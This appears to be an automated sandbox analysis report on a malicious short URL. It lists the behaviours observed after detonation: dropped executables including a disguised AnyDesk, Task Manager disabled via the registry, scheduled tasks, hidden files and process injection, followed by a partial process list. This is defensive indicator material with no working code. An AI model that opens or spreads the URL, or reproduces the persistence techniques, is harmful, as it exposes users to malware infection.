Analysis Overview
Threat Level: Likely malicious
The file http://rb.gy/g44izl was found to be: Likely malicious.
Malicious Activity Summary
Disables Task Manager via registry modification
Possible privilege escalation attempt
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Modifies file permissions
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Checks installed software on the system
Drops file in System32 directory
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Modifies registry key
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
Scheduled Task/Job: Scheduled Task
Delays execution with timeout.exe
Uses Task Scheduler COM API
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Modifies data under HKEY_USERS
Views/modifies file attributes
Modifies registry class
NTFS ADS
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious behavior: AddClipboardFormatListener
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-04 03:16
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-04 03:16
Reported
2024-10-04 03:24
Platform
win10v2004-20240802-en
Max time kernel
475s
Max time network
475s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables Task Manager via registry modification
Downloads MZ/PE file
Possible privilege escalation attempt
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\Goonscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\doorbell-upd6.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\locked.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation | C:\ProgramData\stn.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Goonscript.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\doorbell-upd6.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\locked.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\ProgramData\Anydesk.exe | N/A |
| N/A | N/A | C:\ProgramData\stn.exe | N/A |
| N/A | N/A | C:\ProgramData\Anydesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Anydesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
Modifies file permissions
Checks installed software on the system
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\ad.trace | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\ad.trace | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db | C:\ProgramData\Anydesk.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\AnyDesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\AnyDesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Anydesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Anydesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\AnyDesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\AnyDesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\AnyDesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\AnyDesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\AnyDesk.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\ProgramData\Anydesk.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\ProgramData\Anydesk.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\ProgramData\Anydesk.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" --play \"%1\"" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk.exe\",0" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" \"%1\"" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2412658365-3084825385-3340777666-1000\{B27B3CB8-01DD-4B4E-B437-D87785F51D84} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 199374.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Goonscript.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://rb.gy/g44izl
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9cc5346f8,0x7ff9cc534708,0x7ff9cc534718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5248 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3476 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=3544 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4104 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5808 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4524 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2104,10294787617522047853,18257860882984260744,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5492 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
